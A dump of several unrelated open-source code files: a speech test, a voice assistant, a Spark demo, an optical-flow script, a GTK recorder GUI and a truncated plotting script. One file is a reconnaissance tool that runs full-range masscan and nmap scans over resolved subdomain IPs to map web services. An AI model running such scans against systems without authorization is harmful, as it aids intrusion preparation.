torch.cuda.is_available():\n expected_wav = expected_wav.cuda()\n if fp16:\n expected_wav = expected_wav.half()\n assert torch.equal(load_res[1], expected_wav) # type: ignore[arg-type]\n line_no_sample = f\"{audio_path}|0|{num_frames}\\tcoluimn2\"\n with assert_warns(\n caplog, match=\"Sampling factor not present in file, using provided value.\"\n ):\n assert load_audio(0, gpu, fp16, line_no_sample)[0] == line_no_sample\n\n\n@contextlib.contextmanager\ndef assert_warns(caplog, *, match: str) -> tp.Iterator[None]:\n caplog.clear()\n sputils.warn_once.cache_clear()\n\n with caplog.at_level(logging.WARN):\n yield\n assert len(caplog.messages) == 1\n assert re.match(match, caplog.messages[0])\n caplog.clear()\n\n\ndef test_read_audio(tmp_path: Path):\n \"\"\"Testing that read_audio returns a waveform of the correct shape\"\"\"\n wav_path = str(tmp_path / \"wav_old.wav\")\n torch.manual_seed(0)\n\n # Creating a 3-second bi-channel waveform with non-standard sr and saving as .wav\n dur_old = 3\n sr_old = 48000\n wav_old = torch.randn([2, dur_old * sr_old])\n torchaudio.save(wav_path, wav_old, sample_rate=sr_old)\n\n # loading the audio with utils\n sr_new = 16000\n wav_new = sputils.read_audio(wav_path, sampling_rate=sr_new)\n assert (\n len(wav_new.shape) == 1\n ), f\"The loaded wave should be 1D tensor, but it has shape {wav_new.shape}\"\n dur_new = wav_new.shape[-1] / sr_new\n assert (\n dur_new == dur_old\n ), f\"The wav had duration of {dur_old} sec. but was loaded having {dur_new} sec.\"\n","repo_name":"facebookresearch/stopes","sub_path":"stopes/modules/tests/test_speech_utils.py","file_name":"test_speech_utils.py","file_ext":"py","file_size_in_byte":14304,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"72"} +{"seq_id":"36342563557","text":"import openai\nopenai.api_key = \"put api key here\"\n\nimport pyttsx3\nimport datetime\nimport speech_recognition as sr\nimport wikipedia\nimport webbrowser\n\nimport os\nimport random\n\nfrom selenium import webdriver \nfrom selenium.webdriver.chrome.options import Options \nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\n\nimport requests, json\n\nfrom geopy.geocoders import Nominatim\n\ngeolocator = Nominatim(user_agent=\"geoapiExercises\")\n\n\n\n#register chrome as default web browser\nwebbrowser.register('chrome',None,webbrowser.BackgroundBrowser(\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"))\n\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\n# for voice in voices:\n# print(f\"Voice: {voice.name}\")\nengine.setProperty('voice',voices[1].id)\n\n\n\n\n#speak function\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\n\ndef intro():\n hour = int(datetime.datetime.now().hour)\n if hour>=4 and hour<12:\n speak(\"Good Morning!\")\n elif hour >=12 and hour<18:\n speak(\"Good Afternoon!\")\n else:\n speak(\"Good Evening!\")\n speak(\"I am your assistant Drishti, How may I help you ?\")\n\ndef takeCommand():\n #audio to string\n r=sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\") \n r.pause_threshold=1\n audio = r.listen(source)\n\n try:\n print(\"Recognizing...\")\n query = r.recognize_google(audio, language='en-IN')\n print(f\"User said: {query}\\n\")\n\n except Exception as e:\n # print(e)\n print(\"Say that again please...\")\n return \"None_354465\" #coded string \n \n return query\n\n#to get current location\ndef getLocation():\n options = Options()\n options.add_argument(\"--use--fake-ui-for-media-stream\")\n driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()),options=options)\n timeout = 20\n driver.get(\"https://mycurrentlocation.net/\")\n wait = WebDriverWait(driver, timeout)\n time.sleep(3)\n \n longitude = driver.find_elements(\"xpath\", '//*[@id=\"longitude\"]') \n longitude = [x.text for x in longitude] \n longitude = str(longitude[0]) \n latitude = driver.find_elements(\"xpath\", '//*[@id=\"latitude\"]') \n latitude = [x.text for x in latitude] \n latitude = str(latitude[0]) \n driver.quit() \n print(latitude,longitude)\n location = geolocator.reverse(latitude+\",\"+longitude)\n print(location)\n return(latitude,longitude,location)\n\ndef getweather():\n\n api_key = 'openweather_api_key_here'\n lat = getLocation()[0]\n lon = getLocation()[1]\n\n complete_url = \"https://api.openweathermap.org/data/2.5/weather?lat={lat}&lon={lon}&appid={api_key}\"\n response = requests.get(complete_url)\n x = response.json()\n\n if x[\"cod\"] != \"404\":\n\n y = x[\"main\"]\n current_temperature = y[\"temp\"]-273.15\n current_pressure = y[\"pressure\"]/1000.0\n current_humidity = y[\"humidity\"]\n\n z = x[\"weather\"]\n weather_description = z[0][\"description\"]\n\n # print following values\n print(\" Temperature (in celsius unit) = \" +\n str(current_temperature) +\n \"\\n atmospheric pressure (in hPa unit) = \" +\n str(current_pressure) +\n \"\\n humidity (in percentage) = \" +\n str(current_humidity) +\n \"\\n description = \" +\n str(weather_description))\n \n speak(f\"According to OpenWeatherMap.org {weather_description} is expected at your location \" +\n f\"\\n with current temperature of {current_temperature} degrees celsius \" +\n f\"\\n Atmospheric pressure is {current_pressure} bar and humidity is {current_humidity} percent\")\n\n else:\n print(\"Sorry, Weather Report not found\")\n speak(\"Sorry, Weather Report not found\")\n\n#chatgpt integration\ndef gpt_response(query):\n model_engine = \"text-davinci-003\"\n\n response = openai.Completion.create(\n engine=model_engine,\n prompt=query,\n max_tokens=1024,\n n=1,\n stop=None,\n temperature=0.5,)\n response = response.choices[0].text\n print(response)\n return response\n\n\n\n\n\n \n \n\nif __name__ ==\"__main__\":\n intro()\n flag = 0 #to check if last response of bot was successful\n while True:\n query = takeCommand().lower()\n \n\n #logic for executing tasks on query\n if 'drishti stop' in query:\n break\n\n elif 'gpt' in query:\n speak(gpt_response(query))\n\n flag =0\n\n elif 'wikipedia' in query:\n speak('Searching Wikipedia...')\n query = query.replace(\"wikipedia\",\"\")\n results = wikipedia.summary(query,sentences = 2)\n speak(\"According to Wikipedia,\")\n print(results)\n speak(results)\n\n flag=0\n\n elif 'play music' in query:\n music_dir = 'pathto\\d_bot\\music'\n songs = os.listdir(music_dir)\n print(songs)\n play = random.choice(songs) \n os.startfile(os.path.join(music_dir, play))\n\n elif 'the time' in query:\n strTime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n speak(f\"The time is {strTime}\")\n\n flag =0\n \n elif 'my location' in query:\n speak(f\"Your current location is {getLocation()[2]}\")\n\n flag =0\n\n elif 'weather' in query:\n getweather()\n\n flag=0\n \n\n elif query != \"None_354465\":\n if flag == 0:\n speak(\"Sorry I can't help with that. Please try again ...\")\n flag = 1\n\n \n \n","repo_name":"nomaan-2k/d_bot","sub_path":"drishti_bot.py","file_name":"drishti_bot.py","file_ext":"py","file_size_in_byte":5804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19547091257","text":"from pyspark import SparkConf, SparkContext\n\nsc = SparkContext(\"local\", \"test\")\ninvalid = sc.accumulator(0)\n\ndef count_invalid(el):\n invalid.add(el)\n return el\n\ninfo = sc.parallelize([3,4,5])\ninfo2 = info.map(lambda x: count_invalid(x))\n\nfor x in info2.collect():\n print(x)\n\nprint(invalid)\nsc.stop()\n","repo_name":"sency90/allCode","sub_path":"bigdata/finals/practice/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"70738534632","text":"# Copyright 2023 Abhinav Kumar. All Rights Reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n# ==============================================================================\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\ncapture = cv2.VideoCapture(0)\r\n\r\n# Get initial frame\r\nresponse, first_frame = capture.read()\r\nfirst_gray = cv2.cvtColor(first_frame, cv2.COLOR_BGR2GRAY)\r\nhsv = np.zeros_like(first_frame)\r\nhsv[..., 1] = 255\r\n\r\nwhile True:\r\n response, frame = capture.read()\r\n frame = cv2.flip(frame, 1)\r\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n # Calculates dense optical flow\r\n dense_flow = cv2.calcOpticalFlowFarneback(first_gray, frame, None, 0.5, 4, 13, 5, 7, 1.5, 0)\r\n\r\n # Calculate speed and angle(theta) of motion\r\n speed, theta = cv2.cartToPolar(dense_flow[..., 0], dense_flow[..., 1])\r\n hsv[..., 0] = theta * (180 / np.pi) # Adjusted the angle conversion\r\n hsv[..., 2] = cv2.normalize(speed, None, 0, 255, cv2.NORM_MINMAX)\r\n final = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)\r\n\r\n cv2.imshow('Dense Optical Flow', final)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n first_gray = frame\r\n\r\ncv2.destroyAllWindows()\r\ncapture.release()\r\n","repo_name":"abhinav16aero/cv","sub_path":"Object_Tracking_Detection/ObjectTracking_DenseOptical.py","file_name":"ObjectTracking_DenseOptical.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42064088739","text":"from socket import gethostbyname_ex\nfrom queue import Queue\nfrom threading import Thread, Lock\nfrom core.sql_helper import SQL_helper\nfrom rich.console import Console\nimport subprocess\nimport nmap\nimport json\nfrom lib import config\n\nconsole = Console()\nlock = Lock()\nurl_tag = config.url_tag\n\n\n# 数据库域名转ip,检查cdn,插入数据库\nclass Domain2IP(Thread):\n def __init__(self, domain_queue):\n super(Domain2IP, self).__init__()\n self._domain_queue = domain_queue\n\n def run(self):\n while self._domain_queue.empty() is not True:\n domain = self._domain_queue.get() # 拿到domain\n try:\n _res = gethostbyname_ex(domain)\n # print(f'domain:{_res[0]} , aliases:{_res[1]} , ip list:{_res[2]}')\n if len(_res[2]) != 1:\n console.print('[warning] ' + domain + ' cdn checked...', style='bold yellow')\n # self._res_list.append([_res[0], ','.join(_res[1]), ','.join(_res[2])])\n SQL_helper.update_subdomain_sql(\"cdn_checked\", 'True', domain)\n else:\n # self._res_list.append([_res[0], ','.join(_res[1]), ','.join(_res[2])])\n # 更新ip,cdn字段\n SQL_helper.update_subdomain_sql(_res[2][0], 'False', domain)\n except Exception as e:\n console.print(\"[warning]\" + domain + \" 解析失败,不存活!\", style='bold yellow')\n finally:\n self._domain_queue.task_done()\n\n\ndef ip_domain_cdn():\n domain_queue = Queue()\n # 读取数据库数据放入检查队列\n subdomains_list = SQL_helper.read_subdomain_sql()\n # print(subdomains_list)\n for sub_tuple in subdomains_list:\n # print(sub_tuple[1])\n domain_queue.put(sub_tuple[1])\n # 多线程调用解析域名\n for i in range(20): # 线程 20\n a_thread = Domain2IP(domain_queue)\n a_thread.daemon = True\n a_thread.start()\n domain_queue.join()\n\n\ndef shodan_port_check():\n ...\n\n\nclass MulMasscan(Thread):\n def __init__(self, domain_q, t_id):\n super(MulMasscan, self).__init__()\n self._domain_q = domain_q\n self._tid = t_id\n\n def run(self):\n # 启动端口探测,写文件加锁,会变得很慢?\n while self._domain_q.empty() is not True:\n _ip = self._domain_q.get()\n try:\n urls_list_to_db = MulMasscan.masscan_port_check(_ip, self._tid)\n # 插入数据库\n lock.acquire()\n SQL_helper.url_table_insert(urls_list_to_db, url_tag)\n lock.release()\n except:\n console.print('[error] masscan 端口扫描失败!', style='bold red')\n finally:\n self._domain_q.task_done()\n\n @staticmethod\n def service_check(ip, port):\n console.print(\"[info] \" + \"nmap scanning: \" + ip + ':' + port, style='bold blue')\n nm = nmap.PortScanner()\n ret = nm.scan(ip, port, arguments='-Pn,-sS')\n service_name = ret['scan'][ip]['tcp'][int(port)]['name']\n if 'http' in service_name or service_name == 'sun-answerbook':\n if service_name == 'https' or service_name == 'https-alt':\n url = 'https://' + ip + ':' + port\n else:\n url = 'http://' + ip + ':' + port\n return url\n\n @staticmethod\n def masscan_port_check(ip, tid):\n tmp_list = []\n url_list = []\n results_list = []\n console.print('[info] masscan正在进行端口探测...', style=\"bold blue\")\n cmd = 'masscan ' + ip + ' -p 1-65535 -oJ ./tmp/masscanRes/' + tid + '_res --rate 10000' # 每个线程单独去操作自己文件, 服务器卡顿\n\n rsp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n while True:\n if rsp.poll() == None: # poll() 返回none代表正在运行\n pass\n else:\n break\n\n with open('./tmp/masscanRes/'+tid+'_res', 'r', encoding='utf-8') as wr:\n str0 = wr.read()\n # print('str0',str0)\n if len(str0) == 0:\n return url_list\n str1 = str0[:-4] + str0[-3:] # win 和 lin 切片结果不一样\n # print('str1', str1)\n try:\n json_data = json.loads(str1)\n except:\n console.print('[error] something wrong for json loads!', style='bold red')\n return url_list\n for line in json_data:\n ip = line['ip']\n port = line['ports'][0]['port']\n result_dict = {\n 'ip': ip,\n 'port': port\n }\n tmp_list.append(result_dict)\n if len(tmp_list) > 65535: # 端口过多直接pass\n tmp_list.clear()\n else:\n results_list.extend(tmp_list)\n\n for result in results_list:\n ip = result['ip']\n port = str(result['port'])\n url = MulMasscan.service_check(ip, port) # 没东西\n if url:\n url_list.append(url)\n console.print('[info] get a url: ' + url, style='bold blue')\n # todo 做探活\n return url_list\n\n\ndef port_check():\n ip_list_ = []\n ip_queue = Queue()\n\n subdomain_all_info = SQL_helper.read_subdomain_sql() # subdomain 表信息\n for sub_tuple in subdomain_all_info:\n ip = sub_tuple[2]\n ip_list_.append(ip)\n\n ip_list_ = list(set(ip_list_))\n for ip in ip_list_:\n if ip == \"#\":\n continue\n # 加入队列\n ip_queue.put(ip)\n\n # 多线程启动\n for i in range(20):\n t = MulMasscan(ip_queue, str(i))\n t.daemon = True\n t.start()\n ip_queue.join()\n\n\n# port_check()\n","repo_name":"TimerZz007/misc_scripts","sub_path":"core/auto_collect/port_scan.py","file_name":"port_scan.py","file_ext":"py","file_size_in_byte":5907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71888669672","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport gi\nimport os\nimport re\nimport time\nimport subprocess\n\ngi.require_version(\"Gtk\", \"3.0\")\n\nfrom gi.repository import Gtk, Gio, GLib, GObject\n\nclass MainWindow(Gtk.Window):\n\t\"\"\"La ventana principal\"\"\"\n\n\tinstances = 0\n\n\tdef __init__(self, title):\n\t\tsuper(MainWindow, self).__init__(title=title)\n\t\t# revisamos que sólo esté una instancia de esta clase\n\t\tif self.instances > 0:\n\t\t\traise RuntimeError(\"You can not create two instances of MainWindow\")\n\t\telse:\n\t\t\tself.instances += 1\n\t\t# algunos atributos generales\n\t\tself.title = title\n\t\t# preconfiguración\n\t\tself.set_border_width(10)\n\t\tself.set_default_size(400, 150)\n\t\t# gtk stuffs\n\t\tself.header_bar = Gtk.HeaderBar()\n\t\tself.vbox_main = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n\t\tself.vbox_target = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n\t\tself.hbox_target_label = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=6)\n\t\tself.hbox_target_filename = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=6)\n\t\tself.vbox_preferences = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n\t\tself.hbox_preferences_label = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=6)\n\t\tself.hbox_preferences_check = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=6)\n\t\tself.hbox_preferences_frames = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=6)\n\t\t# more\n\t\tself.button_record = Gtk.Button.new_with_label(\"Grabar\")\n\t\tself.button_stop = Gtk.Button()\n\t\tself.button_play = Gtk.Button()\n\t\tself.label_target = Gtk.Label(\"Destino:\")\n\t\tself.entry_target = Gtk.Entry()\n\t\tself.button_explore = Gtk.Button.new_with_mnemonic(\"_Explorar\")\n\t\tself.label_preferences = Gtk.Label(\"Preferencias:\")\n\t\tself.check_mouse = Gtk.CheckButton(\"Grabar el mouse\")\n\t\tself.check_audio = Gtk.CheckButton(\"Grabar audio\")\n\t\tself.button_audio_settings = Gtk.Button.new_with_mnemonic(\"_Configurar Audio\")\n\t\tself.label_frames = Gtk.Label(\"Frames por segundo:\")\n\t\tself.spinbutton_frames = Gtk.SpinButton()\n\n\t\t# configuración gtk\n\t\tself.header_bar.props.title = self.props.title\n\t\tself.header_bar.set_show_close_button(True)\n\t\tself.spinbutton_frames.set_adjustment(Gtk.Adjustment(30, 0, 100, 1, 10, 0))\n\n\t\tself.button_play.add(Gtk.Image.new_from_icon_name(\"gtk-media-play\", Gtk.IconSize.BUTTON))\n\t\tself.button_stop.add(Gtk.Image.new_from_icon_name(\"gtk-media-stop\", Gtk.IconSize.BUTTON))\n\t\tself.header_bar.add(self.button_record)\n\t\tself.header_bar.add(self.button_play)\n\t\tself.header_bar.add(self.button_stop)\n\t\tself.set_titlebar(self.header_bar)\n\t\t# agregamos los elementos a los boxes\n\t\tself.vbox_target.add(self.hbox_target_label)\n\t\tself.vbox_target.add(self.hbox_target_filename)\n\t\tself.vbox_preferences.add(self.hbox_preferences_label)\n\t\tself.vbox_preferences.add(self.hbox_preferences_check)\n\t\tself.vbox_preferences.add(self.hbox_preferences_frames)\n\t\tself.vbox_main.add(self.vbox_target)\n\t\tself.vbox_main.add(self.vbox_preferences)\n\t\tself.add(self.vbox_main)\n\t\t# agregamos otras cosas\n\t\tself.hbox_target_label.add(self.label_target)\n\t\tself.hbox_target_filename.pack_start(self.entry_target, True, True, 0)\n\t\tself.hbox_target_filename.add(self.button_explore)\n\t\tself.hbox_preferences_label.add(self.label_preferences)\n\t\tself.hbox_preferences_check.add(self.check_mouse)\n\t\tself.hbox_preferences_check.add(self.check_audio)\n\t\tself.hbox_preferences_check.add(self.button_audio_settings)\n\t\tself.hbox_preferences_frames.add(self.label_frames)\n\t\tself.hbox_preferences_frames.add(self.spinbutton_frames)\n\t\t# conectando\n\t\tself.button_record.connect(\"clicked\", self.on_button_record_clicked)\n\t\tself.button_stop.connect(\"clicked\", self.on_button_stop_clicked)\n\t\tself.button_play.connect(\"clicked\", self.on_button_play_clicked)\n\t\tself.button_explore.connect(\"clicked\", self.on_button_explore_clicked)\n\t\tself.button_audio_settings.connect(\"clicked\", self.on_button_audio_settings_clicked)\n\t\tself.check_mouse.connect(\"toggled\", self.on_check_mouse_toggled)\n\t\tself.check_audio.connect(\"toggled\", self.on_check_audio_toggled)\n\t\tself.entry_target.connect(\"changed\", self.on_entry_target_changed)\n\n\tdef on_button_record_clicked(self, widget):\n\t\tpass\n\n\tdef on_button_stop_clicked(self, widget):\n\t\tpass\n\n\tdef on_button_play_clicked(self, widget):\n\t\tpass\n\n\tdef on_button_explore_clicked(self, widget):\n\t\tpass\n\n\tdef on_button_audio_settings_clicked(self, widget):\n\t\tpass\n\n\tdef on_check_mouse_toggled(self, widget):\n\t\tpass\n\n\tdef on_check_audio_toggled(self, widget):\n\t\tpass\n\n\tdef on_entry_target_changed(self, widget):\n\t\tpass\n\nclass ExplorerWindow(Gtk.FileChooserDialog):\n\t\"\"\"La ventana del explorador de archivo\"\"\"\n\tdef __init__(self, parent=None):\n\t\tsuper(ExplorerWindow, self).__init__(\n\t\t\tparent=parent,\n\t\t\ttitle=\"Guardar en:\",\n\t\t\taction=Gtk.FileChooserAction.SAVE)\n\t\tself.logger = parent.logger\n\t\tself.path = None\n\t\tself.add_button(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL)\n\t\tself.add_button(Gtk.STOCK_SAVE_AS, Gtk.ResponseType.OK)\n\t\tself.filter_text = Gtk.FileFilter()\n\t\tself.filter_text.set_name(\"Archivo de vídeo\")\n\t\tself.filter_text.add_mime_type(\"video/mp4\")\n\t\tself.filter_text.add_mime_type(\"video/mkv\")\n\t\tself.filter_text.add_mime_type(\"video/webm\")\n\t\tself.add_filter(self.filter_text)\n\n\tdef explore(self):\n\t\tself.logger.info(\"Se pide explorar\")\n\t\tresponse = self.run()\n\t\tif response == Gtk.ResponseType.OK:\n\t\t\tfilename = self.get_filename()\n\t\t\t# si ya existe, preguntamos\n\t\t\tif os.path.exists(filename):\n\t\t\t\tmessage_dialog = Gtk.MessageDialog(\n\t\t\t\t\tparent=self,\n\t\t\t\t\ttext=\"El archivo %s ya existe, ¿Quiere sobreescribirlo?\" % os.path.basename(filename),\n\t\t\t\t\tuse_markup=False,\n\t\t\t\t\ttype=Gtk.MessageType.WARNING,\n\t\t\t\t\tbuttons=Gtk.ButtonsType.YES_NO,\n\t\t\t\t\tmodal=True)\n\t\t\t\tmessage_dialog.format_secondary_text(\n\t\t\t\t\t\"Si sobreescribes, todo el contenido del archivo será borrado \" +\n\t\t\t\t\t\"para remplazarlo con el nuevo contenido.\")\n\t\t\t\tresponse2 = message_dialog.run()\n\t\t\t\tmessage_dialog.destroy()\n\t\t\t\t# entonces, revisamos qué quiere el usuario\n\t\t\t\tif response2 == Gtk.ResponseType.NO:\n\t\t\t\t\tmessage_dialog.destroy()\n\t\t\t\t\treturn self.explore()\n\t\t\t\telse:\n\t\t\t\t\tself.path = filename\n\t\t\t\t\tmessage_dialog.destroy()\n\t\t\t\t\tself.destroy()\n\t\t\t\t\treturn self.path\n\t\t\telse:\n\t\t\t\tself.path = filename\n\t\t\t\tself.destroy()\n\t\t\t\treturn self.path\n\t\telif response == Gtk.ResponseType.CANCEL:\n\t\t\tself.destroy()\n\t\t\treturn self.path\n\nclass AudioSettinsWindow(Gtk.Dialog):\n\t\"\"\"La ventana que pregunta por más información para configurar la grabación de audio.\"\"\"\n\tdef __init__(self, parent=None):\n\t\tsuper(AudioSettinsWindow, self).__init__(\n\t\t\ttitle=\"Configuración de audio\",\n\t\t\tparent=parent,\n\t\t\tflags=Gtk.DialogFlags.DESTROY_WITH_PARENT)\n\t\tself.logger = parent.logger\n\t\tself._audio_devices = set()\n\t\tself.add_button(Gtk.STOCK_OK, Gtk.ResponseType.OK)\n\t\tself.add_button(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL)\n\t\t# configuramos un par de cosas\n\t\tself.set_border_width(10)\n\t\tself.set_default_size(350, 300)\n\t\t# personalizamos este diálogo\n\t\tself.vbox_main = self.get_content_area()\n\t\tself.vbox_devices = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n\t\tself.frame = Gtk.Frame()\n\t\t# las cosas se agregan\n\t\tself.vbox_main.add(Gtk.Label(\"Seleccione el/los dispositivo(s) de audio.\"))\n\t\tself.vbox_main.add(self.frame)\n\t\t# buscamos los dispositivos de audio\n\t\tfor description, name in self._get_audio_devices().items():\n\t\t\ttext = description + \"\\n\"\n\t\t\ttext += \"(\" + name + \")\"\n\t\t\tself.logger.debug(\"Obtenido: \" + text)\n\t\t\tcheck_audio_device = Gtk.CheckButton(text)\n\t\t\tcheck_audio_device.connect(\"toggled\", self.on_check_audio_devices_toggled, name)\n\t\t\tself.vbox_devices.add(check_audio_device)\n\t\t# vamos terminando\n\t\tself.frame.add(self.vbox_devices)\n\t\tself.frame.set_label(\"los dispositivos:\")\n\t\tself.show_all()\n\t\n\tdef _get_audio_devices(self):\n\t\toutput = subprocess.check_output([\"pacmd\", \"list-sources\"])\n\t\tname_devices = re.findall(\"name: <(.*)>\", output.decode())\n\t\tdescription_devices = re.findall(\"device.description = \\\"(.*)\\\"\", output.decode())\n\t\treturn {description: name for description, name in zip(description_devices, name_devices)}\n\n\tdef on_check_audio_devices_toggled(self, widget, name):\n\t\tif widget.get_active():\n\t\t\tself._audio_devices.add(name)\n\t\telse:\n\t\t\tself._audio_devices.remove(name)\n\n\t@property\n\tdef audio_devices(self):\n\t\treturn list(self._audio_devices)\n\nclass ProgressWindow(Gtk.Dialog):\n\t\"\"\"La ventana que muestra qué tal va el procesamiento de los archivos\"\"\"\n\tdef __init__(self, parent):\n\t\tsuper(ProgressWindow, self).__init__(\n\t\t\tself,\n\t\t\tparent=parent,\n\t\t\ttitle=\"Procesando archivos...\",\n\t\t\tflags=Gtk.DialogFlags.DESTROY_WITH_PARENT)\n\t\tself.logger = parent.logger\n\t\tself.process = None\n\t\tself.std = None\n\t\tself.cancelled = False\n\t\tself.re_duration = re.compile(r\"Duration: (\\d\\d):(\\d\\d):(\\d\\d(\\.\\d\\d))\")\n\t\tself.re_time = re.compile(r\"time=(\\d\\d):(\\d\\d):(\\d\\d\\.\\d\\d)\")\n\t\t# agregamos un botón\n\t\tself.add_button(Gtk.STOCK_STOP, Gtk.ResponseType.CANCEL)\n\t\t# configuramos un par de cosas\n\t\tself.set_border_width(10)\n\t\tself.set_default_size(350, 100)\n\t\t# personalizamos este diálogo\n\t\tself.vbox_main = self.get_content_area()\n\t\tself.progress = Gtk.ProgressBar()\n\t\tself.label_info = Gtk.Label()\n\t\t# las cosas se agregan\n\t\tself.vbox_main.add(self.label_info)\n\t\tself.vbox_main.add(self.progress)\n\t\tself.show_all()\n\n\tdef check(self, process, std, info):\n\t\tself.logger.debug(\"Nuevo trabajo para: \" + info)\n\t\tself.process = process\n\t\tself.std = std\n\t\tduration = -1\n\t\tself.label_info.set_text(info)\n\t\tself.progress.set_fraction(0.0)\n\t\tbuffer = str()\n\t\twhile self.process.poll() is None:\n\t\t\tcontent = self.std.read()\n\t\t\tcontent = content.decode()\n\t\t\tcontent = content.replace(\"\\r\", \"\\n\")\n\t\t\tif content:\n\t\t\t\tbuffer += content\n\t\t\t\tif duration < 0:\n\t\t\t\t\tmatched = self.re_duration.search(buffer)\n\t\t\t\t\tif matched:\n\t\t\t\t\t\tnumbers = list(matched.groups())[:3]\n\t\t\t\t\t\tnumbers.reverse()\n\t\t\t\t\t\tduration = sum([float(number)*(60**i) for i,number in enumerate(numbers)])\n\t\t\t\t\t\tself.logger.debug(\"La duration: \" + str(duration))\n\n\t\t\t\t\t\t# revisamos el otro a ver\n\t\t\t\t\t\tmatched = self.re_time.search(buffer)\n\t\t\t\t\t\tif matched:\n\t\t\t\t\t\t\tGLib.idle_add(self.update_progress, fraction=1.0)\n\t\t\t\t\t\t\tself.logger.debug(\"Ya estaba finalizado\")\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tcontinue\n\t\t\t\t#self.logger.debug(\"La duration: \" + str(duration))\n\t\t\t\tif duration > 0:\n\t\t\t\t\tmatched = self.re_time.findall(buffer)\n\t\t\t\t\tmatched.reverse()\n\t\t\t\t\tmatched = matched[:-1]\n\t\t\t\t\tif matched:\n\t\t\t\t\t\tnumbers = list(matched[0])[:3]\n\t\t\t\t\t\tnumbers.reverse()\n\t\t\t\t\t\ttime = sum([float(number)*(60**i) for i,number in enumerate(numbers)])\n\t\t\t\t\t\tfraction = time / duration\n\t\t\t\t\t\tself.logger.debug(\"Valor time: \" + str(time) + \" > \" + str(numbers) + \" = \" + str(fraction))\n\t\t\t\t\t\tGLib.idle_add(self.update_progress, fraction)\n\t\t\t\tbuffer = buffer[:-50]\n\t\treturn self.process.poll()\n\n\tdef cancel(self):\n\t\t# cancela el actual proceso\n\t\tself.logger.info(\"Se cancela el progreso\")\n\t\tself.process.terminate()\n\t\tself.cancelled = True\n\n\tdef update_progress(self, fraction):\n\t\tself.progress.set_fraction(fraction)","repo_name":"David256/BlueLobsterRecorder","sub_path":"classes/gui/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"441710668","text":"import pygame\r\nfrom Table import Table\r\nimport settings\r\n\r\n\r\nclass Game:\r\n window = pygame.display.set_mode(settings.WINDOW_SIZE)\r\n clock = pygame.time.Clock()\r\n pygame.display.set_caption(\"Game 2048\")\r\n pygame.init()\r\n\r\n def __init__(self):\r\n self.table = Table((4, 4), 125)\r\n self.game_running = 1\r\n self.FPS = 1\r\n\r\n def run(self):\r\n self.table.update()\r\n self.table.update()\r\n while self.game_running:\r\n self.clock.tick(self.FPS)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.game_running = 0\r\n return\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n self.table.update(3)\r\n elif event.key == pygame.K_RIGHT:\r\n self.table.update(1)\r\n elif event.key == pygame.K_DOWN:\r\n self.table.update(2)\r\n elif event.key == pygame.K_UP:\r\n self.table.update(0)\r\n self.draw()\r\n\r\n def draw(self):\r\n self.table.draw(self.window)\r\n pygame.display.flip()\r\n\r\n def update(self):\r\n pass\r\n","repo_name":"MDastan2005/Python-programms","sub_path":"2048/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18561399936","text":"#!/usr/bin/python3\n\nplot = '■'\n\nimport sys\n\ndata = ((len(sys.argv) > 1) and open(sys.argv[1]) or sys.stdin).readlines()\ndata = [item.strip().split('\\t') for item in data]\ndata = [(str(label), int(value)) for (label, value) in data ]\n\nlabels, values = zip(*data)\nmax_label_width = max(map(lambda x: len(str(x)), labels))\ndel labels\n\nmax_value_width = max(map(lambda x: len(str(x)), values))\nmax_value = max(values)\ndel values\n\nfrom shutil import 